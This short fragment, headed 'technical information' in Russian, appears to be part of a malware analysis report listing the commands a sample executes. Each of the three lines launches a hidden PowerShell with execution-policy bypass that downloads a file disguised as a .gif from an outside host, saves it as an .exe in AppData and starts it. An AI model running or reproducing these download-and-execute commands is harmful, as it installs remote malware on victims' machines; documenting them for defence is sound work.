Техническая информация
- '<SYSTEM32>\cmd.exe' /c "POwErSHEll.EXe -exeCUTIONpOLIcY bYPass -NOpROfILE -WiNdWStYLE HiddeN (nEW-ObJect sYstEm.nEt.wEbclIEnt).DwnladfILe('http://www.znedpesa.tp/read.php?f=1.gif','%APpData%.exe');STart...
- '<SYSTEM32>\cmd.exe' /c "POwErSHEll.EXe -exeCUTIONpOLIcY bYPass -NOpROfILE -WiNdWStYLE HiddeN (nEW-ObJect sYstEm.nEt.wEbclIEnt).DwnladfILe('http://www.znedpesa.tp/read.php?f=1.gif','%APpData%.exe');STart...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exeCUTIONpOLIcY bYPass -NOpROfILE -WiNdWStYLE HiddeN (nEW-ObJect sYstEm.nEt.wEbclIEnt).DwnladfILe('http://www.znedpesa.tp/read.php?f=1.gif','%APPDATA%.exe');STart-PrCEss '%APPDATA%....